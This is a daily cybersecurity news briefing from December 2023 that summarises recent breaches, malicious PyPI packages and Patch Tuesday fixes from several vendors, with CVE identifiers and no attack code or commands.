We use cookies to improve your experience. Do you accept?

Cyware Daily Threat Intelligence

Cyware Daily Threat Intelligence - Featured Image

Daily Threat Briefing Dec 13, 2023

The open-source security landscape faces a significant threat as thousands of exposed pfSense instances were observed at risk due to command injection and cross-site scripting vulnerabilities, potentially leading to RCE attacks and access to sensitive resources. Meanwhile, hundreds of malicious packages in PyPI—downloaded over 10,000 times since May 2023—were discovered affecting 53 projects. These packages delivered a backdoor capable of remote command execution, exfiltration, and taking screenshots on both Windows and Linux systems.

In a different story, Sophos issued a warning about a critical severity flaw in its Firewall product (approaching EoL) under active exploitation. Other firms that have addressed severe vulnerabilities across their products on this last Patch Tuesday of the year include SAP, Google, Atlassian, Microsoft, and more.

Top Breaches Reported in the Last 24 Hours

Russia's Tax service infrastructure impacted

Ukraine's defense intelligence (GUR) claimed it crippled over 2,300 servers of Russia's state tax service (FNS). GUR allegedly breached a central FNS server, destroying databases and backups, causing "complete destruction" of the agency's infrastructure. The attack reportedly paralyzed FNS's internet connection for a month, with recovery deemed unlikely.

Attack on Ukrain’s top telecom firm

A cyberattack on Kyivstar, Ukraine's largest telecom operator, disrupted internet and mobile services. Kyivstar’s parent company is investigating the attack's impact. The outage affected air raid sirens, retail payments, and ATMs. The self-proclaimed Russian attacker group KillNet claimed responsibility for the attack.

Database laid bare millions of donors’ records

DonorView, a cloud-based fundraising platform used by non-profits, exposed almost a million records containing PII of donors. The exposed data includes donor names, addresses, phone numbers, emails, payment methods, and more. Infosec researcher Jeremiah Fowler discovered the exposed database and found records that appeared to include information about children associated with the donations.

Dubai’s transportation service breached

Dubai Taxi Company (DTC), a major transportation service in Dubai, suffered a significant data breach, exposing over 197,000 app users and 23,000 drivers. The leaked data, stored in an open MongoDB database, included customer information, logs, drivers' details, bank information, and passenger order details. The breach, covering data from 2018 to 2021, potentially compromised email addresses, phone numbers, tokens, and driver specifics such as driving license numbers and encrypted passwords.

Top Malware Reported in the Last 24 Hours

Malicious packages corrupt OS duo

ESET Research uncovered a cluster of malicious PyPI packages, distributing a custom backdoor and, in some cases, the notorious W4SP Stealer or a clipboard monitor for cryptocurrency theft. This impacts both Windows and Linux systems. The researchers identified 116 malicious packages within 53 projects on PyPI, with over 10,000 downloads by victims. Techniques employed by the attackers include embedding malicious code in the setup.py file and using lightly obfuscated code.

Top Vulnerabilities Reported in the Last 24 Hours

Microsoft's patches 33 flaws

Microsoft's last Patch Tuesday for 2023 addressed 33 vulnerabilities, with four rated ‘Critical’ and 29 ‘Important.’ The fixes covered various products, including Windows, Internet Connection Sharing, and Microsoft Outlook. One notable flaw (CVE-2023-36019) in Power Platform Connector could allow attackers to execute malicious scripts in victims' browsers. Additionally, three DHCP server service vulnerabilities were patched, addressing denial-of-service and information disclosure issues.

pfSense bugs expose 1,450 instances to RCE

Around 1,450 exposed pfSense instances are vulnerable to command injection and cross-site scripting (XSS) flaws, according to SonarSource researchers. These flaws impact pfSense 2.7.0 and older and pfSense Plus 23.05.01 and older versions. While the reflected XSS flaws require user interaction, the command injection flaw (CVE-2023-42326) allows attackers to execute commands with root privileges, requiring account access with interface editing permissions.

Sophos addressed flaws in EoL versions

Sophos issued patches for a critical vulnerability (CVE-2022-3236) exploited in its Firewall versions 19.0 MR1 (19.0.1) and older. While initially patched in September 2022, the flaw was exploited in the wild again, prompting an updated fix in December 2023. The code injection vulnerability allows RCE and affects the Firewall’s User Portal and Webadmin components. Organizations with instances updated to supported versions after September 2022 are protected, but EOL firmware is vulnerable.

Multiple RCE flaws in Atlassian products

Atlassian, a widely used collaboration platform, faces a critical threat with multiple vulnerabilities that enable remote code execution. The issues are tracked as CVE-2023-22522, CVE-2023-22523, CVE-2023-22524, and CVE-2022-1471. Products like Confluence, Jira, and Bitbucket are impacted, potentially allowing attackers to gain unauthorized access, manipulate data, or create privileged accounts. The risk extends to government and business entities, with potential consequences varying based on user privileges.

SAP’s Patch Day updates out

SAP announced 15 new and two updated security notes as part of its December 2023 Security Patch Day. Among the updates are four hot news security notes, addressing vulnerabilities in the SAP Business Technology Platform (BTP) and the Chromium-based browser in SAP Business Client. One hot news note fixes a critical severity elevation of privilege flaw in BTP, urging customers to review and apply the update. SAP also released high-priority security notes with patches addressing issues in Commerce Cloud, BusinessObjects, SAP GUI, and EMARSYS SDK Android.

Google Chrome fixes high severity flaws

Google released an update for its Chrome browser, addressing several vulnerabilities, including five high-severity flaws. Notably, the most severe of the fixed issues is a type confusion bug in the V8 JavaScript engine (CVE-2023-6702). The other high-severity flaws are use-after-free bugs in various components that could lead to arbitrary code execution, data corruption, or denial of service.

Related Threat Briefings